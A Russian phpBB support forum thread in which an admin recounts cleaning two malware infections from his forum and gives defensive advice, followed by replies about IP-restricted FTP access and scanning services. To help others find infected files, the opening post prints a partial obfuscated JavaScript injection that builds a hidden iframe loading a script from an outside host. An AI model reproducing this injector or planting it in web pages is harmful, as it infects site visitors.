Полезная информация


----

Начать новую тему Ответить на тему
АвторСообщение

 Сообщение Трояны и phpbb3 2013-05-01

Аватар пользователя

Всем доброго времени суток. Каждый день ломаю голову, думаю чего бы еще интересного вам рассказать на основе личного опыта. В свете недавнешних событий, решил что можно порассуждать о троянских вирусах (хотя не знаю почему повелось так называть заражение, ведь вроде ПК-ные троянцы тырят личные данные, а сайтовые - врядли). Собственно начнем ....

Многие из вас частенько натыкались в интернете на сайты, которые были поражены вирусами, при посещении которых антивирус начинал истошно вопить. Натыкался на такие и я, думал мол, как так админы допустили это (ну конечно есть определенный процент сайтов, созданных специально для рассады заразы). Думал меня пронесет, все вроде защищено... Ан нет, в истории нашего форума произошло 2 заражения. Первое - очень легкое, заражены были только JS-файлы, а может я вовремя заглянул и закрыл очаг. Второе же, недавнешнее - очень жесткое. Почти 60% файлов были заражены, а это и php-, html-, JS-файлы + перенаправление на какой то трейдерский сайт. Потратив день, сумел все же восстановить форум. Дело это конечно неприятное, но зато получил своеобразный опыт, да и бекап форума сделал наконец то полный :hi_hi_hi:

Так что ребята, никогда не расслабляйтесь, беда может и вас постигнуть.... Давайте подумаем, а чем же можно уберечься от подобных ситуаций ?

1. Пароли к панели хостинга и ФТП
- Это основное и самое больное место всех без исключения. Вам главное понять, что каким бы ни был начальный пароль, данный вам хостером - он рано или поздно будет взломан. Почему ? Да потому, что ни у одного хостера я не видел задержки на безошибочный ввод пароля. Иными словами, если ктото задастся целью ломануть пароль - его ничто не остановит. Пароль можно подбирать бесконечно долго, таймаутов на ввод неправильного пароля нет нигде. Собственно первоочередная ваша задача - смена дефолтных паролей доступа на более сложные, я бы даже рекомендовал делать пароли максимально длинными. Составляйте их таким образом, чтобы логика напрочь отсутствовала, брякните по клаве на 20 знаков пароль с цифрами и буквами. Чем длинней пароль - тем дольше его подбирать, у взломщика может попросту кончиться терпение.

2. Доступы на папки сервера
- Это такая вещь, стоящая на одном уровне с первым пунктом. Возможно даже выше. Тут главное понять что злоумышленникам иногда и не надо подбирать пароли. Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777), то вам несдобровать. Банально заливается шелл и в течении пары часов ваш форум заражен. Так что не лепите тысячи папок на ФТП, делайте только нужные и настраивайте к ним нормальные права доступа.

3. Проверенные модификации и скрипты
- Раз уж говорим о наших форумах, то нужно помнить и об этом пункте. Собственно вас могут подкупить красивым названием и описанием мода(скрипта), а уж внутри него будет настоящий троянчик или уязвимость. Так что советую ставить только моды, прошедшие валидацию на оффоруме. Ставить моды, которые вам необходимы, а не потому что у большинства они стоят. Такое же дело и со скриптами. Перед их установкой внимательно читайте описание, комменты, просмотрите код скриптов, если чтото покажется подозрительным - лучше спросить у знающих людей.

4. Частые и полные бекапы форума.
- Способ пассивной защиты, писать особо тут нечего. Логика проста - если вы делаете частые полные бекапы форума, то при заражении файлов, вам потребуется всего лишь заново залить файлики с заменой (ну разумеется пароли поменять от хостинга).

5. Панель вебмастера Гугл
- Этот инструмент весьма полезен. Почему не яндекс ? Потому что яндекс не умеет кое чего. Представим себе такую ситуацию - вам необходимо отлучиться от форума на достаточно большой срок, доступ у вас есть только к почте, а за это время ваш форум все же заразили. Так вот, с задержкой в 5-6 часов вам придет на мыло письмецо от Гугла, мол заражен ваш форум. Очень полезная вещь, ведь никто не знает наверняка когда форум может быть заражен, а так вы получите уведомление и наиболее быстро среагируете на аварию. Собственно, не ленитесь и добавляйте свой форум в панель вебмастера Гугла

Со способами защиты мы ознакомились, теперь подумаем над вашими действиями в том случае если все же получили заражение ....

Раз уж вы читаете данную статью, то наверняка после прочтения добавите наконец то свой форум в Гугл :hi_hi_hi:
Так вот, либо сами замечаете недовольство антивируса на ваш форум либо получаете письмецо от Гугла, тут главное не паниковать, не делать опрометчивых действий. Расслабьтесь и начинайте по пунктам...

1. Отключение форума на уровне хостинга
- Такая функция должна быть у каждого хостера. Тут же вам надо отключить работу вашего домена, дабы прекратить издевательство над пользователями (заодно и возможно остановить процесс распространения заражения). Не бойтесь этого делать, ФТП доступ у вас то будет.

2. Смена паролей
- Очевидное решение - поменяйте пароли всех доступов на хостинг - панель, ФТП, может еще чего. Таким действием отрубим потенциального злоумышленника от файлов.

3. Работа с файлами форума
- Есть актуальный бекап ? Восстанавливаем. Нет ? Скачиваем абсолютно все файлы форума себе на компьютер и через Нотепад ++ смотрим сначала все JS файлы. Они заражаются в первую очередь, потом уж остальные. Смотрим код скриптов на наличие совершенно лишних участков, к примеру у меня был такой код (он разумеется не полный)
<!--ded509--> catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_77_27_
44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_
74__30_42_14_11_14_11_27_27_27_27_77_35_7a_79_6a_27_44_27_2e_6f_7b_7
b_77_41_36_36_6a_68_6a_68_6d_73_7c_77_35_79_7c_36_6a_76_7c_75_7b_38_3e_35_77_6f_77_2e_42_14_11_27_27_27_27_77_35_7a_7
b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73
_7c_7b_6c_2e_42_14_11_27_27_27_27_77
__63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27
_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80
_50_6b_2f_2e_77_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_77_30_42_
14_11_27_27_27_27_84_14_11_84_30_2f_30_42""split"}</script><!--/ded509-->
 

Ну очень такое бросается в глаза. Плюс, проблема всех таких вставок - код везде абсолютно одинаков. Значит открываем блокнот и идем в поиск по файлам, для начала вбиваем весь кусок вредоносного кода и выбираем опцию удаления найденного. Потом берем выдающуюся часть, у себя я взял ded509 и еще раз вбиваем это в поиск по файлам для успокоения совести (а вдруг все же вставка разная есть). После этого визуально осматриваем папки форума на наличие новых и непонятных папок с файлами, удаляем подозрительное. Потом для чистоты эксперимента сканируем все файлы антивирем и заливаем все обратно на ФТП с обязательной заменой.

4. Завершающий этап
- Активируем работу домена, смотрим на адекватную работу форума, антивирь молчит. Все хорошо, идем в панель хостинга и смотрим лог работ с папками за ближайшие 24 часа. Нам надо выловить момент заражения и понять - ломанули ли пароль иль шелл залили, делаем необходимые выводы. В панели вебмастера Гугла отправляем форум на перепроверку и в течении 24 часов ваш форум полностью разблокируется в Гугле и продолжит свою работу на благо общества :hi_hi_hi:

Впринципе наверное все написал что и хотел. Сами видите, дело одновременно и сложное и простое это. Надеюсь вас не постигнет такая беда, а если что - у вас есть маленькое руководство к действию, можете и мне в личку стукнуть, помогу если будет завал. Всем безоблачной работы ваших форумов :ya_hoo_oo:

ЗЫ. Может у кого есть еще советы? Пишите, не стесняйтесь, составим руководство вместе :ras_pal_cov_ka:


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!

Теги темы
Трояны и phpbb3
          Вернуться наверх  
 


Аватар пользователя

Я думаю нельзя, процентов на 80 )) Просто еще не разбирался в том, как шеллы заливают на сервер


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Добрый день. Скажите пожалуйста, можно ли не бояться заражения сайта, если доступ доступ к FTP разрешен только с одного IP адреса ?


          Вернуться наверх  
 


Аватар пользователя

Можно, это хорошая защита


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

А где это указывается?


_________________
Подпись:
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
          Вернуться наверх  
 


Аватар пользователя

Видимо где то в недрах хостинга


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Lorem Ipsum писал(а):

А где это указывается?

У меня такая возможность предоставлена хостингом. В панели управления хостингом есть возможность разрешить доступ к FTP только с указанных в списке адресов. Аналогично и к MySQL, - только с указанных в списке адресов.


          Вернуться наверх  
 


Аватар пользователя

Так для этого нужно чтоб был статический ай-пи? Он же меняется всё время.


          Вернуться наверх  
 


Аватар пользователя

У моего провайдера, допустим, можно заказать за доп плату статический айпи вместо динамического)))


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

У моего провайдера тоже (думаю, что у любого), но если кто этого не сделает и разрешит изменения только с одного айпи (о чём речь в этой теме), то отхавает по полной! :zvez_ochki:


          Вернуться наверх  
 


Аватар пользователя

Ну наверное думать головой надо перед тем как такое делать))Тем более если уж так накосячить, то через панель управления хостингом можно все назад вернуть))А вот если есть настройка доступа к панели управления для одного айпи - тогда техподдержка только поможет, если накосячишь))И то может послать далеко, посчитав твое обращение за попытку взлома)) Ну это если бы да кабы)))


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

У меня есть домен.кз (не очень которым занимаюсь) и форум.домен.кз.... собственно сам форум! Две БД.
Сегодня хостеры написали, что домен.кз пытались взломать путем подбора паролей к административной панели. Теперь сделали вход в админ-панель к домен.кз только по моему ай-пи! :co_ol:
вопрос: 1. форум.домен.кз не защищен ведь все равно по ай-пи?
2. чем был чреват взлом домен.кз для форума? Базы данных разные.....


          Вернуться наверх  
 


Аватар пользователя

Если я правильно понимаю - домен.кз -это родитель для форум.домен.кз, а взлом родителя - это очень плохо
Лена писал(а):

форум.домен.кз не защищен ведь все равно по ай-пи?

Защищен по идее
Лена писал(а):

чем был чреват взлом домен.кз для форума? Базы данных разные.....

Домен и хостинг у разных провайдеров куплен или у одного ?


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

А что даст, если сделать SSL- сертификат? Чтобы в адресе стояло
Пожалуйста Зарегистрируйтесь чтобы увидеть ссылку
.


_________________
Подпись:
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
          Вернуться наверх  
 


Аватар пользователя

ursego писал(а):

Надо зарегистрировать свой форум на сайте siteguard.ru. Они периодически сканируют

А с какой периодичностью они сканируют?

PS. Что-то я не вижу, где там вход и выход. И ещё, я залогинилась, где я могу изменить свои контактные данные, мыло, например?


_________________
Подпись:
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
          Вернуться наверх  
 


Аватар пользователя

Lorem Ipsum писал(а):

А с какой периодичностью они сканируют?
А холера их знает...

Lorem Ipsum писал(а):

Что-то я не вижу, где там вход и выход. И ещё, я залогинилась, где я могу изменить свои контактные данные, мыло, например?
Там, по-моему, нельзя менять личные данные, коих всего две штуки - имейл (он-же логин) и пароль. Они предлагают неплохую кнопочку, которая должна понравиться форумчанам, особенно страдающим вирусофобией. Я ещё и добавил в неё всплывающую подсказку для пущего душеуспокоения:

title="Система SiteGuard совершает периодическое сканирование форума на предмет обнаружения вирусов для предотвращения опасности заражения компьютеров пользователей"
 

Кстати, вот
Пожалуйста Зарегистрируйтесь чтобы увидеть ссылку
.


          Вернуться наверх  
 


Аватар пользователя

DeaDRoMeO писал(а):

Домен и хостинг у разных провайдеров куплен или у одного ?

у одного. А почему ты спросил?


          Вернуться наверх  
 


Аватар пользователя

Ну если все куплено у разных и, допустим, ломанули панель домена, то за ФТП и файлы можно не волноваться


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Не знаю, чёто меня напряг этот сайтгард.


_________________
Подпись:
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
          Вернуться наверх  
 


Аватар пользователя

Я чет не люблю такие ресурсы))


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Ну поделись, почему не любишь? Хочу сравнить со своими мыслями.


_________________
Подпись:
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
          Вернуться наверх  
 
 
Начать новую тему Ответить на тему


Дополнительные возможности

  Похожие темы  Автор  Ответов  Просмотров  Последнее сообщение 
Аватар пользователя SQL ERROR phpbb3
В данной теме я буду рассматривать всевозможные ошибки Базы Данных и пути решения проблем

DeaDRoMeO

0

437

Аватар пользователя

08 окт 2011, 18:51

DeaDRoMeO

Аватар пользователя Сео-оптимизация phpbb3
Статья посвящена небольшой сео-оптимизации форума, эти правки нужно выполнить всем админам, заботящимся о хорошей выдаче

DeaDRoMeO

368

28283

Аватар пользователя

21 ноя 2017, 10:11

DeaDRoMeO

Аватар пользователя NV who was here phpbb3 ? - Кто был на форуме ?
NV who was here phpbb3 ? - модификация добавляет на форум phpbb3 новый информационный блок, содержащий в себе полный список тех, кто был на форуме за день

DeaDRoMeO

52

7383

Аватар пользователя

05 фев 2015, 16:13

DeaDRoMeO

Аватар пользователя BB3Topics phpbb3
BB3Topics - модификация для phpbb3, добавляющая блок на главную страницу форума со следущим содержимым - Новые темы, Последние обьявления, Популярные темы, Обсуждаемые темы, Случайные темы, Темы с опросами

DeaDRoMeO

96

10401

Аватар пользователя

05 мар 2017, 18:36

DeaDRoMeO

Аватар пользователя Who Views Who phpbb3
Who Views Who - модификация для phpbb3, которая немного расширит информацию предоставляемую на странице Кто Онлайн

DeaDRoMeO

8

2553

Аватар пользователя

30 сен 2013, 20:27

DeaDRoMeO

Оставить свой комментарий

Поделиться темой с помощью

Ссылки на тему

Прямая ссылка:
BB-код для форумов, сайтов, блогов:
HTML ссылка:
 


Самая неформальная поддержка phpBB :P